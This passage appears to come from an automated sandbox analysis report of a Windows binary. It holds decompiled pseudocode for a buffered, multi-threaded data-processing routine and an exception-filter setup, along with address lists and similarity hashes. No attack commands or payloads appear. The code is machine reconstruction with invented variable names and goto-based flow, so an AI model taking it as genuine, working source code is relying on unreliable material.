    						goto L10;
    					}
    				}
    				if( *((intOrPtr*)(__ecx + 0x5f)) == 0) {
    					L4:
    					_t393 = 0;
    					goto L17;
    				}
    				_push(_t370);
    				_push(0);
    				_push(__ecx + 0x10);
    				_push(_t574);
    				if(E00848143(0) != 0) {
    					_t665 = 0;
    					__eflags = 0;
    					goto L6;
    				} else {
    					E00836F18(0x8700e0, 1);
    					goto L4;
    				}
    			}























































































    0x0083845d
    0x00838467
    0x0083846d
    0x00838470
    0x00838473
    0x00838475
    0x0083847b
    0x00838482
    0x00838488
    0x008384b4
    0x008384b5
    0x008384bb
    0x008384be
    0x0083854d
    0x00838553
    0x00838559
    0x00838571
    0x00838571
    0x00838577
    0x0083858f
    0x0083858f
    0x00838592
    0x00838598
    0x008385b5
    0x008385ba
    0x008385be
    0x008385c8
    0x008385d3
    0x008385d8
    0x008385da
    0x008385dd
    0x008385e0
    0x008385e2
    0x008385e4
    0x008385e8
    0x008385ea
    0x008385ec
    0x008385ec
    0x008385e8
    0x008385f4
    0x008385f9
    0x008385fa
    0x00838607
    0x00838608
    0x00838610
    0x00838617
    0x0083861a
    0x00838671
    0x00838676
    0x00838678
    0x0083867a
    0x00838680
    0x00838686
    0x0083868a
    0x0083868a
    0x0083868a
    0x0083868a
    0x0083861c
    0x0083861f
    0x00838625
    0x00838627
    0x00838629
    0x0083862d
    0x0083862f
    0x00838636
    0x0083863b
    0x0083863c
    0x00838643
    0x00838648
    0x00838652
    0x00838654
    0x0083866a
    0x00838656
    0x00838658
    0x0083865f
    0x00838661
    0x00838661
    0x00838654
    0x0083862d
    0x00838627
    0x00838693
    0x00838698
    0x008386b0
    0x008386ba
    0x008386bd
    0x008386bf
    0x008386c3
    0x008386c6
    0x008386c9
    0x008386cc
    0x008386e4
    0x008386e7
    0x008386ec
    0x008386f2
    0x008386f3
    0x008386f5
    0x008386fe
    0x008386fe
    0x00838700
    0x00838703
    0x0083870d
    0x00838714
    0x00838719
    0x0083871b
    0x008390da
    0x008390da
    0x0083853a
    0x0083853b
    0x00838540
    0x0083854a
    0x0083854a
    0x0083872f
    0x00838732
    0x0083873a
    0x00838741
    0x00838744
    0x0083875b
    0x0083875b
    0x0083875e
    0x0083875e
    0x00838763
    0x00838766
    0x0083876d
    0x0083876e
    0x00838771
    0x00838774
    0x0083877f
    0x0083877f
    0x00838782
    0x00838789
    0x00838789
    0x0083878f
    0x00838796
    0x00838797
    0x008387a5
    0x008387aa
    0x008387ac
    0x008387e4
    0x008387e7
    0x008387f3
    0x008387f3
    0x008387f3
    0x008387f6
    0x008387f6
    0x00838800
    0x00838805
    0x00838807
    0x0083882b
    0x0083882b
    0x00838832
    0x00000000
    0x00000000
    0x00838834
    0x0083883e
    0x00838843
    0x00838845
    0x00838924
    0x00000000
    0x00838924
    0x0083884b
    0x0083884e
    0x0083885c
    0x0083885d
    0x0083885d
    0x0083885f
    0x00838868
    0x0083886b
    0x00838877
    0x0083888a
    0x00838894
    0x008388a6
    0x008388ab
    0x008388b2
    0x00838948
    0x00838948
    0x0083894c
    0x00838952
    0x00838957
    0x0083895d
    0x00838962
    0x00838968
    0x0083896f
    0x00838974
    0x00838975
    0x00838977
    0x00838a0a
    0x00838a0c
    0x00838a11
    0x00838a13
    0x00838a65
    0x00838a68
    0x00838a6a
    0x00838a8e
    0x00838a91
    0x00838a91
    0x00838a98
    0x00838ad0
    0x00838ad2
    0x0083908f
    0x0083908f
    0x00839093
    0x00839099
    0x0083909e
    0x008390a2
    0x008390a5
    0x008390a8
    0x008390aa
    0x008390aa
    0x008390aa
    0x008390aa
    0x008390b0
    0x008390b0
    0x008390b4
    0x00000000
    0x00000000
    0x008390b6
    0x008390b8
    0x00838538
    0x00838538
    0x00000000
    0x00838538
    0x008390be
    0x008390c4
    0x008390d2
    0x008390d4
    0x00000000
    0x00000000
    0x00000000
    0x008390d4
    0x008390c6
    0x008390c8
    0x00000000
    0x008390c8
    0x00838ad8
    0x00838ad8
    0x00838adb
    0x00838ae2
    0x00838af4
    0x00838af4
    0x00838af7
    0x00838af9
    0x00838b40
    0x00838b40
    0x00838b44
    0x00838b46
    0x00838b4e
    0x00838b4e
    0x00838b62
    0x00838b68
    0x00838b6e
    0x00838b74
    0x00838b85
    0x00838b9b
    0x00838ba6
    0x00838baf
    0x00838bb2
    0x00838bb9
    0x00838bbf
    0x00838bc4
    0x00838bc7
    0x00838bc9
    0x00838bcc
    0x00838bcf
    0x00838bd2
    0x00838bd5
    0x00838bd8
    0x00838bda
    0x00838c7d
    0x00838c7d
    0x00838c80
    0x00838c87
    0x00838c8e
    0x00838c92
    0x00838ca8
    0x00838caa
    0x00838caa
    0x00838cab
    0x00838cab
    0x00838caf
    0x00838cb2
    0x00838cb5
    0x00838cb8
    0x00838dc4
    0x00838dcb
    0x00838dcd
    0x00838dd4
    0x00838dfe
    0x00838e03
    0x00838e15
    0x00838e1b
    0x00838e1d
    0x00838e23
    0x00838e3d
    0x00838dd6
    0x00838dd6
    0x00838ddc
    0x00838de2
    0x00838de3
    0x00838de3
    0x00838dd4
    0x00838e42
    0x00838e44
    0x00838e49
    0x00838e50
    0x00838e82
    0x00838e82
    0x00838e82
    0x00838e84
    0x00838e86
    0x00838e86
    0x00838e8d
    0x00838e97
    0x00838e9e
    0x00838ebd
    0x00838ebd
    0x00838ec1
    0x00838ec4
    0x00838f25
    0x00838f25
    0x00838f29
    0x00838f2c
    0x00838f3f
    0x00838f3f
    0x00838f3f
    0x00838f41
    0x00838f41
    0x00838f45
    0x00000000
    0x00000000
    0x00838f4b
    0x00838f4e
    0x00838f52
    0x00838f5e
    0x00838f5e
    0x00838f62
    0x00838f7d
    0x00838f7d
    0x00838f7f
    0x00838f94
    0x00838f94
    0x00838f96
    0x0083905a
    0x0083905a
    0x0083905d
    0x00839064
    0x0083906c
    0x00839073
    0x00839078
    0x0083907a
    0x00839083
    0x00839083
    0x0083907a
    0x00839088
    0x00000000
    0x00839088
    0x00838f9c
    0x00838fa1
    0x00838fa3
    0x00838fa6
    0x00838fac
    0x00838fac
    0x00838fae
    0x00838fc0
    0x00838fc0
    0x00838fc6
    0x00838fcb
    0x00838fd4
    0x00838fe8
    0x00838fef
    0x00839002
    0x00839004
    0x0083900d
    0x00839012
    0x00839018
    0x00839027
    0x0083903a
    0x0083904d
    0x0083904f
    0x00839052
    0x00839057
    0x00000000
    0x00839057
    0x00838fb0
    0x00838fb6
    0x00000000
    0x00000000
    0x00838fb8
    0x00838fbe
    0x00000000
    0x00000000
    0x00000000
    0x00838fbe
    0x00838fa8
    0x00838faa
    0x00000000
    0x00000000
    0x00000000
    0x00838faa
    0x00838f81
    0x00838f84
    0x00838f8b
    0x00000000
    0x00000000
    0x00838f91
    0x00000000
    0x00838f91
    0x00838f64
    0x00838f66
    0x00000000
    0x00000000
    0x00838f68
    0x00838f6f
    0x00000000
    0x00000000
    0x00838f75
    0x00838f77
    0x00000000
    0x00000000
    0x00000000
    0x00838f77
    0x00838f54
    0x00838f58
    0x00000000
    0x00000000
    0x00000000
    0x00838f58
    0x00838f2e
    0x00838f35
    0x00000000
    0x00000000
    0x00838f37
    0x00838f39
    0x00000000
    0x00000000
    0x00838f3b
    0x00000000
    0x00838f3b
    0x00838ec6
    0x00838eca
    0x00000000
    0x00000000
    0x00838ecc
    0x00838ece
    0x00000000
    0x00000000
    0x00838ed0
    0x00838ed6
    0x00838f00
    0x00838f00
    0x00838f0a
    0x00838f0b
    0x00838f0d
    0x00838f0d
    0x00838f19
    0x00838f1d
    0x00838f22
    0x00000000
    0x00838f22
    0x00838ed8
    0x00838ede
    0x00838ee8
    0x00838ee8
    0x00838eef
    0x00000000
    0x00000000
    0x00838ef1
    0x00838efb
    0x00838efc
    0x00000000
    0x00838efc
    0x00838ee0
    0x00838ee6
    0x00000000
    0x00000000
    0x00000000
    0x00838ee6
    0x00838ea0
    0x00838ea6
    0x00000000
    0x00000000
    0x00838ea8
    0x00838eb2
    0x00838eb2
    0x00838eb4
    0x00838eb6
    0x00838eb6
    0x00000000
    0x00838eb4
    0x00838eaa
    0x00838eb0
    0x00000000
    0x00000000
    0x00000000
    0x00838eb0
    0x00838e8f
    0x00000000
    0x00838e8f
    0x00838e67
    0x00838e73
    0x00838e78
    0x00838e7a
    0x00000000
    0x00000000
    0x00838e7c
    0x00838e7e
    0x00000000
    0x00838e7e
    0x00838cbe
    0x00838cc4
    0x00838cc7
    0x00838d30
    0x00838d35
    0x00838d46
    0x00838d4b
    0x00838d4e
    0x00838d50
    0x00838d9d
    0x00838d9d
    0x00838da0
    0x00838da0
    0x00838da7
    0x00838cfc
    0x00838cfc
    0x00838cfe
    0x00838dba
    0x00838dba
    0x00838dba
    0x00838dbc
    0x00838dbc
    0x00000000
    0x00838dbc
    0x00838d04
    0x00838d04
    0x00838d06
    0x00000000
    0x00000000
    0x00838d0e
    0x00000000
    0x00838d0e
    0x00838dad
    0x00838daf
    0x00000000
    0x00000000
    0x00838cf8
    0x00838cf8
    0x00000000
    0x00838cf8
    0x00838d52
    0x00838d5a
    0x00000000
    0x00000000
    0x00838d5c
    0x00838d62
    0x00838d6e
    0x00838d6f
    0x00838d72
    0x00838d80
    0x00838d81
    0x00838d88
    0x00838d74
    0x00838d74
    0x00838d74
    0x00838d8d
    0x00838d8d
    0x00838d90
    0x00838d92
    0x00838cf5
    0x00838cf5
    0x00000000
    0x00838cf5
    0x00838d98
    0x00000000
    0x00838d98
    0x00838cc9
    0x00838ccc
    0x00000000
    0x00000000
    0x00838cce
    0x00838cd0
    0x00838d14
    0x00838d14
    0x00838d16
    0x00000000
    0x00000000
    0x00838d22
    0x00838d29
    0x00000000
    0x00838d29
    0x00838cd2
    0x00838cd5
    0x00000000
    0x00000000
    0x00838cd7
    0x00838cda
    0x00000000
    0x00000000
    0x00838ce9
    0x00838cee
    0x00838cf0
    0x00838cf2
    0x00000000
    0x00838cf2
    0x00838c94
    0x00838c96
    0x00000000
    0x00000000
    0x00838c9a
    0x00838c9b
    0x00838c9f
    0x00000000
    0x00000000
    0x00838ca3
    0x00838ca4
    0x00000000
    0x00838ca4
    0x00838be0
    0x00838be6
    0x00000000
    0x00000000
    0x00838bec
    0x00838bf2
    0x00838bf8
    0x00838bfa
    0x00838c7a
    0x00838c7a
    0x00000000
    0x00838c7a
    0x00838bfc
    0x00838c06
    0x00838c06
    0x00838c16
    0x00838c19
    0x00838c1b
    0x00838c75
    0x00838c75
    0x00838c78
    0x00838c78
    0x00000000
    0x00838c78
    0x00838c1d
    0x00838c23
    0x00838c25
    0x00838c27
    0x00838c4c
    0x00838c52
    0x00838c5e
    0x00838c69
    0x00838c72
    0x00000000
    0x00838c72
    0x00838c29
    0x00838c33
    0x00838c35
    0x00838c3a
    0x00838c40
    0x00000000
    0x00000000
    0x00838c42
    0x00000000
    0x00000000
    0x00838c44
    0x00838c4a
    0x00000000
    0x00000000
    0x00000000
    0x00838c4a
    0x00838c2b
    0x00838c31
    0x00000000
    0x00000000
    0x00000000
    0x00838c31
    0x00838c1f
    0x00838c21
    0x00000000
    0x00000000
    0x00000000
    0x00838c21
    0x00838bfe
    0x00838c04
    0x00000000
    0x00000000
    0x00000000
    0x00838c04
    0x00838b48
    0x00838b48
    0x00838b48
    0x00838b48
    0x00000000
    0x00838b48
    0x00838aff
    0x00838b02
    0x00838b03
    0x00838b06
    0x00838b08
    0x00838b13
    0x00838b15
    0x00838b24
    0x00838b36
    0x00838b36
    0x00838b15
    0x00000000
    0x00838b06
    0x00838ae4
    0x00838aeb
    0x00838af2
    0x00838b3d
    0x00000000
    0x00838b3d
    0x00000000
    0x00838af2
    0x00838a9e
    0x00838aa1
    0x00838aa8
    0x00838aaf
    0x00838ab4
    0x00838ab6
    0x00000000
    0x00000000
    0x00838ab8
    0x00838aba
    0x00838abd
    0x00838abd
    0x00838ac3
    0x00838ac8
    0x00000000
    0x00838ac8
    0x00838a6c
    0x00838a75
    0x00838a76
    0x00838a7b
    0x00838a7e
    0x00838a80
    0x00838a88
    0x00838a88
    0x00838a8a
    0x00000000
    0x00000000
    0x00000000
    0x00838a8c
    0x00838a15
    0x00838a19
    0x00838a1f
    0x00838a22
    0x00838a26
    0x00838a2e
    0x00838a2f
    0x00838a32
    0x00838a3a
    0x00838a3b
    0x00838a3e
    0x00838a40
    0x00838a46
    0x00838a4c
    0x00838a4e
    0x00838a54
    0x00838a5b
    0x00838a5e
    0x00838a5e
    0x00838a4c
    0x00838a3e
    0x00838a32
    0x00838a26
    0x00000000
    0x00838a19
    0x0083897d
    0x00838980
    0x00000000
    0x00000000
    0x00838986
    0x00838989
    0x0083898c
    0x0083898e
    0x00000000
    0x00000000
    0x00838994
    0x00838997
    0x00000000
    0x00000000
    0x0083899d
    0x008389a0
    0x008389a7
    0x00000000
    0x00000000
    0x008389af
    0x008389b9
    0x008389be
    0x008389c0
    0x008389f7
    0x008389f7
    0x008389fb
    0x00838a85
    0x00000000
    0x00838a85
    0x00838a01
    0x00838a03
    0x00838a05
    0x00000000
    0x00838a05
    0x008389c2
    0x008389c6
    0x00000000
    0x00000000
    0x008389c8
    0x008389d0
    0x008389d1
    0x008389d8
    0x008389f2
    0x00000000
    0x008389f2
    0x008388b8
    0x008388bf
    0x00000000
    0x00000000
    0x008388c7
    0x008388d2
    0x008388d7
    0x008388da
    0x008388dc
    0x00000000
    0x00000000
    0x008388de
    0x008388e5
    0x00000000
    0x00000000
    0x008388e7
    0x008388ee
    0x008388f8
    0x008388f9
    0x00838930
    0x00838932
    0x0083893e
    0x00838943
    0x00838945
    0x00000000
    0x00838945
    0x008388fb
    0x008388fd
    0x0083890b
    0x00838910
    0x00838914
    0x0083891a
    0x0083891a
    0x0083882b
    0x00838810
    0x00838817
    0x0083881c
    0x00838823
    0x00000000
    0x00838823
    0x008387b5
    0x008387bb
    0x008387c0
    0x008387c2
    0x00000000
    0x00000000
    0x008387c4
    0x008387cb
    0x008387dd
    0x008387df
    0x00000000
    0x008387df
    0x008387ce
    0x008387d4
    0x008387d9
    0x008387db
    0x00000000
    0x00000000
    0x00000000
    0x008387db
    0x00838784
    0x00838787
    0x00000000
    0x00000000
    0x00000000
    0x00838787
    0x00838776
    0x0083877d
    0x00000000
    0x00000000
    0x00000000
    0x0083877d
    0x00838746
    0x0083874d
    0x00000000
    0x00000000
    0x0083874f
    0x00838753
    0x00838759
    0x00000000
    0x00000000
    0x00000000
    0x00838759
    0x008386f7
    0x008386fa
    0x008386fc
    0x00000000
    0x00000000
    0x00000000
    0x008386fc
    0x008386ce
    0x008386d4
    0x008386d7
    0x008386da
    0x008386dc
    0x00000000
    0x008386e2
    0x008386e2
    0x008386e2
    0x00000000
    0x008386e2
    0x008386dc
    0x008385a0
    0x008385a6
    0x00000000
    0x00000000
    0x008385a8
    0x008385af
    0x00000000
    0x00000000
    0x00000000
    0x008385af
    0x00838579
    0x00838583
    0x00838583
    0x00838589
    0x00000000
    0x00838589
    0x0083857b
    0x00838581
    0x00000000
    0x00000000
    0x00000000
    0x00838581
    0x0083855b
    0x00838565
    0x00838565
    0x0083856b
    0x00000000
    0x0083856b
    0x0083855d
    0x00838563
    0x00000000
    0x00000000
    0x00000000
    0x00838563
    0x008384c4
    0x008384c7
    0x008384e6
    0x008384e6
    0x008384e9
    0x00000000
    0x00000000
    0x008384ef
    0x008384f6
    0x00000000
    0x00000000
    0x00838501
    0x00838502
    0x00838506
    0x00838507
    0x00838508
    0x0083850d
    0x0083850f
    0x00838524
    0x00838535
    0x00000000
    0x00838511
    0x00838518
    0x00000000
    0x00838518
    0x0083850f
    0x008384c9
    0x008384d0
    0x00000000
    0x008384d6
    0x008384e1
    0x00000000
    0x008384e1
    0x008384d0
    0x0083848d
    0x008384ab
    0x008384ab
    0x00000000
    0x008384ab
    0x0083848f
    0x00838490
    0x00838494
    0x00838495
    0x0083849d
    0x008384b2
    0x008384b2
    0x00000000
    0x0083849f
    0x008384a6
    0x00000000
    0x008384a6

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog_memcmp
    • String ID:
    • API String ID: 3004599000-0
    • Opcode ID: 6dab1485a852a0749c35923a51660546f5b517524609ebfdb272bdfb725a2dbb
    • Instruction ID: d199d99d1aa96e8695b0a8836020b920296042690b8a3d8b6863285a0dd7ac5f
    • Opcode Fuzzy Hash: 6dab1485a852a0749c35923a51660546f5b517524609ebfdb272bdfb725a2dbb
    • Instruction Fuzzy Hash: 7982E670904285EEDF15DF64C485BEABBA9FF95300F0840BAF849DB142DB719A85CBE1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084E643() {
    				_Unknown_base(*)()* _t1;
    
    				_t1 = SetUnhandledExceptionFilter(E0084E64F); // executed
    				return _t1;
    			}




    0x0084e648
    0x0084e64e

    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_0001E64F,0084E0C4), ref: 0084E648
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: 97da637b9e4552faaf0851ec6dc8fb0c8aed8ed1720061614cf43bbee8b3027e
    • Instruction ID: f696319c0f9db86b78e551ea04402b20da2dbd6af61be6c50d621b22c8c24c61
    • Opcode Fuzzy Hash: 97da637b9e4552faaf0851ec6dc8fb0c8aed8ed1720061614cf43bbee8b3027e
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E008462E0(signed int __ecx, void* __edx, void* __eflags) {
    				void* __ebp;
    				signed int _t161;
    				intOrPtr _t164;
    				signed int _t170;
    				signed int _t171;
    				signed int _t175;
    				signed int _t178;
    				void* _t181;
    				void* _t188;
    				signed int _t193;
    				signed int _t194;
    				signed int _t195;
    				signed int _t197;
    				signed int _t208;
    				signed int _t212;
    				intOrPtr _t213;
    				signed int _t216;
    				signed int _t219;
    				signed int _t223;
    				signed int _t225;
    				signed int _t226;
    				intOrPtr* _t232;
    				void* _t238;
    				signed int _t240;
    				signed int _t241;
    				intOrPtr _t245;
    				intOrPtr _t247;
    				signed int _t257;
    				intOrPtr* _t259;
    				signed int _t260;
    				signed int _t263;
    				intOrPtr* _t267;
    				intOrPtr _t268;
    				void* _t269;
    				signed int _t270;
    				void* _t272;
    				signed int _t273;
    				void* _t274;
    				void* _t276;
    
    				_t216 = __ecx; // executed
    				E00842AF2(__ecx, __edx); // executed
    				E0084434B(__ecx,  *((intOrPtr*)(_t274 + 0x138)));
    				_t240 = 0;
    				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
    					_t238 = 0;
    					do {
    						_t213 =  *((intOrPtr*)(_t216 + 0x18));
    						_t238 = _t238 + 0x4ae4;
    						_t240 = _t240 + 1;
    						 *((char*)(_t213 + _t238 - 0x13)) = 0;
    						 *((char*)(_t213 + _t238 - 0x11)) = 0;
    					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
    				}
    				_t219 = 5;
    				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
    				E0084EA80( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
    				_t276 = _t274 + 0x18;
    				_t263 = 0;
    				 *(_t276 + 0x28) = 0;
    				_t268 = 0;
    				 *((char*)(_t276 + 0x13)) = 0;
    				 *((intOrPtr*)(_t276 + 0x18)) = 0;
    				 *((char*)(_t276 + 0x12)) = 0;
    				while(1) {
    					L4:
    					_push(0x00400000 - _t263 & 0xfffffff0);
    					_push( *((intOrPtr*)(_t216 + 0x20)) + _t263);
    					_t161 = E0083C7AC();
    					 *(_t276 + 0x2c) = _t161;
    					if(_t161 < 0) {
    						break;
    					}
    					_t263 = _t263 + _t161;
    					 *(_t276 + 0x20) = _t263;
    					if(_t263 != 0) {
    						if(_t161 <= 0) {
    							goto L56;
    						} else {
    							if(_t263 >= 0x400) {
    								L56:
    								while(_t268 < _t263) {
    									_t225 = 0;
    									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
    									 *(_t276 + 0x1c) = 0;
    									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
    									__eflags = _t170;
    									if(_t170 != 0) {
    										_t245 =  *((intOrPtr*)(_t276 + 0x18));
    										_t273 = 0;
    										__eflags = 0;
    										do {
    											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
    											 *(_t276 + 0x28) = _t225;
    											__eflags =  *((char*)(_t259 + 0x4ad3));
    											 *_t259 = _t216;
    											if( *((char*)(_t259 + 0x4ad3)) == 0) {
    												E0083A54E(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
    												_t263 =  *(_t276 + 0x20);
    												 *((intOrPtr*)(_t259 + 8)) = 0;
    												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
    												__eflags = _t170;
    												 *((intOrPtr*)(_t259 + 4)) = 0;
    												 *(_t259 + 0x4acc) = _t170;
    												if(_t170 != 0) {
    													 *((char*)(_t259 + 0x4ad0)) = 0;
    													 *((char*)(_t259 + 0x14)) = 0;
    													 *((char*)(_t259 + 0x2c)) = 0;
    													_t225 =  *(_t276 + 0x1c);
    													goto L15;
    												}
    											} else {
    												 *(_t259 + 0x4acc) = _t263;
    												L15:
    												__eflags =  *(_t276 + 0x2c);
    												 *((char*)(_t259 + 0x4ad3)) = 0;
    												 *(_t259 + 0x4ae0) = _t225;
    												__eflags =  *((char*)(_t259 + 0x14));
    												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
    												if( *((char*)(_t259 + 0x14)) != 0) {
    													L20:
    													__eflags =  *((char*)(_t276 + 0x13));
    													if( *((char*)(_t276 + 0x13)) != 0) {
    														L23:
    														 *((char*)(_t259 + 0x4ad1)) = 1;
    														 *((char*)(_t276 + 0x13)) = 1;
    													} else {
    														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
    														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
    															goto L23;
    														} else {
    															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
    														}
    													}
    													_t273 = _t273 + 0x4ae4;
    													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
    													_t225 = _t225 + 1;
    													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
    													_t208 = _t263 - _t245;
    													__eflags = _t208;
    													 *(_t276 + 0x1c) = _t225;
    													if(_t208 < 0) {
    														L26:
    														__eflags = _t208 - 0x400;
    														if(_t208 >= 0x400) {
    															goto L27;
    														}
    													} else {
    														__eflags =  *((char*)(_t259 + 0x28));
    														if( *((char*)(_t259 + 0x28)) == 0) {
    															goto L26;
    														}
    													}
    												} else {
    													 *((char*)(_t259 + 0x14)) = 1;
    													_push(_t259 + 0x18);
    													_push(_t259 + 4);
    													_t212 = E00843446(_t216);
    													__eflags = _t212;
    													if(_t212 == 0) {
    														L29:
    														 *((char*)(_t276 + 0x12)) = 1;
    													} else {
    														__eflags =  *((char*)(_t259 + 0x29));
    														if( *((char*)(_t259 + 0x29)) != 0) {
    															L19:
    															_t225 =  *(_t276 + 0x1c);
    															 *((char*)(_t216 + 0xe662)) = 1;
    															goto L20;
    														} else {
    															__eflags =  *((char*)(_t216 + 0xe662));
    															if( *((char*)(_t216 + 0xe662)) == 0) {
    																goto L29;
    															} else {
    																goto L19;
    															}
    														}
    													}
    												}
    											}
    											goto L30;
    											L27:
    											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
    											__eflags = _t225 - _t170;
    										} while (_t225 < _t170);
    									}
    									L30:
    									_t226 =  *(_t276 + 0x14);
    									_t171 = _t226;
    									_t257 = _t171 /  *(_t216 + 0x1c);
    									__eflags = _t171 %  *(_t216 + 0x1c);
    									if(_t171 %  *(_t216 + 0x1c) != 0) {
    										_t257 = _t257 + 1;
    										__eflags = _t257;
    									}
    									_t269 = 0;
    									__eflags = _t226;
    									if(_t226 != 0) {
    										_t247 = 0;
    										_t267 = _t276 + 0x34;
    										_t195 = _t257 * 0x4ae4;
    										__eflags = _t195;
    										 *((intOrPtr*)(_t276 + 0x24)) = 0;
    										 *(_t276 + 0x30) = _t195;
    										do {
    											_t232 = _t267;
    											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
    											_t197 =  *(_t276 + 0x14) - _t269;
    											_t267 = _t267 + 8;
    											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
    											__eflags = _t257 - _t197;
    											if(_t257 < _t197) {
    												_t197 = _t257;
    											}
    											__eflags =  *(_t276 + 0x1c) - 1;
    											 *(_t232 + 4) = _t197;
    											if( *(_t276 + 0x1c) != 1) {
    												E00840474( *((intOrPtr*)(_t216 + 0x14)), E00846D1F, _t232);
    											} else {
    												E00846715(_t216, _t248);
    											}
    											_t269 = _t269 + _t257;
    											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
    											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
    											__eflags = _t269 -  *(_t276 + 0x14);
    										} while (_t269 <  *(_t276 + 0x14));
    										_t263 =  *(_t276 + 0x20);
    									}
    									_t270 =  *(_t276 + 0x1c);
    									__eflags = _t270;
    									if(_t270 == 0) {
    										_t268 =  *((intOrPtr*)(_t276 + 0x18));
    										goto L68;
    									} else {
    										E008406B1( *((intOrPtr*)(_t216 + 0x14)));
    										 *(_t276 + 0x14) = 0;
    										__eflags = _t270;
    										if(_t270 == 0) {
    											L52:
    											_t175 =  *((intOrPtr*)(_t276 + 0x12));
    											goto L53;
    										} else {
    											_t260 = 0;
    											__eflags = 0;
    											do {
    												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
    												__eflags =  *((char*)(_t272 + 0x4ad1));
    												if( *((char*)(_t272 + 0x4ad1)) != 0) {
    													L47:
    													_t178 = E00846D4E(_t216, _t272);
    													__eflags = _t178;
    													if(_t178 != 0) {
    														goto L48;
    													}
    												} else {
    													_t194 = E00842E9F(_t216, _t272);
    													__eflags = _t194;
    													if(_t194 != 0) {
    														__eflags =  *((char*)(_t272 + 0x4ad1));
    														if( *((char*)(_t272 + 0x4ad1)) == 0) {
    															L48:
    															__eflags =  *((char*)(_t272 + 0x4ad0));
    															if( *((char*)(_t272 + 0x4ad0)) == 0) {
    																__eflags =  *((char*)(_t272 + 0x4ad3));
    																if( *((char*)(_t272 + 0x4ad3)) != 0) {
    																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
    																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
    																	__eflags = _t263 - _t181;
    																	if(_t263 > _t181) {
    																		_t263 = _t263 - _t181;
    																		 *(_t276 + 0x2c) = _t263;
    																		E00850E40(_t230, _t181 + _t230, _t263);
    																		_t276 = _t276 + 0xc;
    																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
    																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
    																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
    																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
    																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
    																		__eflags =  *(_t276 + 0x14);
    																		if( *(_t276 + 0x14) != 0) {
    																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
    																			E0084EA80(_t188, _t272, 0x4ae4);
    																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
    																			_t263 =  *(_t276 + 0x2c);
    																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
    																			 *((char*)(_t272 + 0x4ad3)) = 0;
    																			goto L62;
    																		}
    																		goto L63;
    																	}
    																} else {
    																	__eflags =  *((char*)(_t272 + 0x28));
    																	if( *((char*)(_t272 + 0x28)) != 0) {
    																		_t175 = 1;
    																		 *((char*)(_t276 + 0x12)) = 1;
    																		L53:
    																		__eflags = _t175;
    																		if(_t175 == 0) {
    																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
    																			_t263 = _t263 - _t268;
    																			__eflags = _t263 - 0x400;
